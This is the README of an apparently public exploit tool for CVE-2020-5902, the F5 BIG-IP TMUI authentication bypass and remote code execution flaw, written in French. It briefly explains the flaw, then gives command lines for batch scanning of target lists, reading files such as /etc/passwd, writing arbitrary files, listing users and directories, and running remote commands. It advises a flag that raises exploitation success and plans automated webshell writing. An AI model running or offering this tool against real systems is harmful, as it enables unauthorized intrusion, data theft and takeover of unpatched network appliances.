
Outil de vérification automatique de la RCE CVE-2020-5902 sur F5 BIG-IP
Le 6 juillet 2020, la vulnérabilité RCE TMUI de F5 BIG-IP a été divulguée en ligne.
Le composant TMUI (interface utilisateur de gestion du trafic) de F5 BIG-IP présente une vulnérabilité de contournement de l'authentification. Celle-ci réside dans une divergence entre l'URL analysée par Tomcat et request.getPathInfo(), ce qui permet de contourner la vérification des autorisations, d'accéder sans authentification à toutes les fonctionnalités du module TMUI, puis de lire/écrire des fichiers arbitraires et d'exécuter des commandes, etc.
Pour plus de détails, voir Reproduction de la vulnérabilité RCE TMUI de F5 BIG-IP (CVE-2020-5902) et points d'attention
Cet outil prend en charge la détection sur IP unique et par lot. Il permet la lecture/écriture de fichiers, le listage des utilisateurs authentifiés, le listage de répertoires, l'exécution de commandes à distance et la détection du contournement de l'authentification hsqldb.
pip install requests
python f5-bigip-rce-cve-2020-5902.py -h

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

Pour les IP traitées par lot, ajoutez de préférence http:// ou https:// au début ; si aucun protocole n'est précisé, http:// sera ajouté par défaut.
Si les conditions le permettent, il est recommandé d'ajouter le paramètre --still-exploit : même si la commande list auth user échoue, la RCE est malgré tout exécutée, ce qui augmente le taux de réussite.
Envoyer plusieurs requêtes pour augmenter le taux de réussite en mode batch, en tenant compte du compromis sur l'efficacité.
Intégrer l'exploitation de la désérialisation de l'interface hsqldb.
Ajouter l'écriture automatisée de webshell.
issus
lsablog
gmail : [email protected]
qq : [email protected]